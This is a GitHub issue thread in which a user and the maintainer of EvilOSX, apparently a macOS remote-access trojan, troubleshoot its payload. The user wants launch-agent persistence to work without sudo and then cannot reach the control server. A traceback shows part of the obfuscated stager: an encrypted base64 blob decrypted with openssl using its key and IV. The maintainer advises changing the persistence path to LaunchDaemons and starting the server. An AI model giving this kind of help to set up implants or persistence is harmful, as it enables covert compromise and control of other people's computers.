### ISSUE TITLE
Persistence without sudo

### ISSUE THREAD

**Issue by rwbxn** [Marten4n6/EvilOSX#5]
Love your project, awesome stuff here. Question: Is it possible to use persistence without sudo? I don't have enough permission to create launching agent.

`python EvilOSX-QhVinzCn.py 
[DEBUG] setup_persistence:277 - Creating launch agent...
Traceback (most recent call last):
  File "EvilOSX-QhVinzCn.py", line 5, in <module>
    4uGuuy8Z/0IP5XY4hyb6syO54ULQlUWmMLd0MP2aSXwGFfLUGHq1kiRPo51U2rBwv2FnVbZcoDNJLDsUOB0vsfrghENmanW6nV+bCeOCp6NYy8sG/fysPmoZRybxzLZESxvpIeT0cWVaOLiFehDqAicr1wFysWT+6HXw6Hi8lbKljaHPxVQJcJBg/K1Ba2O5Br9po/sm+rVkeWi7NzbRwuPlzWDo3Ug+ZJJlCJ5DLFr23ncR3YELpftMTAW2Th9+HEXV4dCnRCmM2OGrsGEnDR+ciqLlC94E0mgbNjtFdHHs2yKt4kCDGXeRh3EMAJtgxR1utZFBs9xmtKd3wvHdhWYQmI5u5y389UNK3keWGEZyRTvoufEltV0Q5oFmZANH7P7G900Fxqr7WtPCg/F4wLeJ5EBY4o8BoprOOuP9Xo1rtHUh8K+EjJvFErvg9bZSdBmBnAf3l60KqxkdghrZD7GCLlDPzS5AOag63z8Kb5RcyZdGMD+dVqcbjuFKA3pwipkG9otUwXlp+8a1eKmsSHjkXPqmz6d5+yHL/YVtNnMRCbHnl1bzNkFE2vtOKINqnA/MBoqqz5UGsZR9LEhzHWR5jcLWTXCjihyfIN96btvOhwpFSeLm7g7lfJJMrSYL1RADc/8/oHgfGrr1mNOVrpY1hlS/1JdDGtnb1S9YebYxgrP/xJU91Ix5PCRzWZTLFVVBf13Vc3fS8WkFahkuWzlQlb7HsMspjQdjRkpskHEtkfxPloRMiaooi1sAZLR7HUx9/vS/UEoMyc/MiNiZXJNo942TNUgFj3u08zw+ojXRDxZScl2KZu9cJaQCAx2yLHIuGB19d0ET3WBctHD/F71efiawNrqua3+mtj4Dac7nNxmHPM0Am+rQ9TK4pkwQq7F1tCv5evAJTzgs+bwK0aeqi5t23aETsmq9uXQGo4ZZbK9AyDyngJA6qVt3GILddFqxWtykC2uQQyhTal/IvjHT7n0mVaD6VUMpcJIjRg4ZC94GvtNU3QVTdA23UW4X8SF3BEHNapGAwCSBxwewZ5y0P9lcsoEDA5EPf8vXjTZQGTHvgI2u2LhOW79e5YawkXpTtNl0XgEeSz2I6EhwJZ0i5x3i6CMPVl0ua6TuWbitZdpTKurkZFdnPTZ7ORSMRGgtuEToAh6Ns+cr7JCZP8+A6r4QQTqz6/sBmGsDw/DX+2DEWQAzO/u7wCFx1IC/ilgeAm6sb0rNgrD5XI0R6vo/hTSgSo7A== | openssl aes-256-cbc -A -d -a -k 467B12CE94827C47C23134FF6A071987DCA0665BBFF37B5ECEB68C105E18706B -iv 610AE8765A4E6E9DA97F03BF384AFDBC -S D96EFD5B0BF98878 -md sha256 | base64 --decode").readlines()))
  File "<string>", line 459, in <module>
  File "<string>", line 379, in main
  File "<string>", line 298, in setup_persistence
IOError: [Errno 13] Permission denied: '/Users/xxxx/Library/LaunchAgents/oko.plist'`

Everything works fine with sudo, or if I disable persistence at building the payload. 

Bug or not possible?

**Comment by Marten4n6** [comment]
Very weird. Never had a permission issue with that directory, persistence doesn't need root.
Are you running any anti-virus software (this might be blocking writing to the LaunchAgents directory)?

**Comment by rwbxn** [comment]
No, it's a fresh new Macbook Air, did exactly nothing with it, except for trying to run the payload. Really weird.

**Comment by Marten4n6** [comment]
https://github.com/Marten4n6/EvilOSX/blob/master/EvilOSX.py#L342 is the line which decides which directory the launch agent is written to, could you change this line to:
`return os.path.expanduser("~/Library/LaunchDaemons")`
Once you've changed this line you can build a new payload and it'll use this directory, hopefully this fixes the issue.

**Comment by rwbxn** [comment]
Unfortunately not working, no permission without root and Library/LaunchDaemons does not exist on my device. I tried again with root and he is creating the folder then.

Output with root:
[DEBUG] setup_persistence:277 - Creating launch agent...
[DEBUG] setup_persistence:302 - Moving EvilOSX...
[DEBUG] setup_persistence:312 - Loading launch agent...
[ERROR] setup_persistence:326 - Unexpected output: /Users/xxxxx/Library/LaunchDaemons/oiou.plist: Path had bad ownership/permissions
[INFO] main:383 - Receiving command...
[WARNING] main:446 - Failed to connect to the server.

**Comment by Marten4n6** [comment]
![](https://i.imgur.com/yjYeIzA.png)
> Library/LaunchDaemons does not exist on my device.

That doesn't matter, EvilOSX will create the directory.
I have a feeling you accidentally ran a payload as sudo before and are now trying to run another payload without sudo. This won't work since EvilOSX would of created the directories with the owner set to root so you won't have permission to write to it.

**Comment by Marten4n6** [comment]
Closing due to inactivity, feel free to reopen this issue.

**Comment by rwbxn** [comment]
Did a factory reset on the device and tried again. Now I'm getting this error:

```
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "<string>", line 24, in <module>
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 154, in urlopen
    return opener.open(url, data, timeout)
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 431, in open
    response = self._open(req, data)
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 449, in _open
    '_open', req)
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 409, in _call_chain
    result = func(*args)
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 1240, in https_open
    context=self._context)
  File "/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/urllib2.py", line 1197, in do_open
    raise URLError(err)
urllib2.URLError: <urlopen error [Errno 61] Connection refused>
```

Do you know what's wrong? I don't want to try to open with root access, but I think that it has nothing to do with the permission. Thank you.

**Comment by Marten4n6** [comment]
> urllib2.URLError: <urlopen error [Errno 61] Connection refused>

You need to start the server.
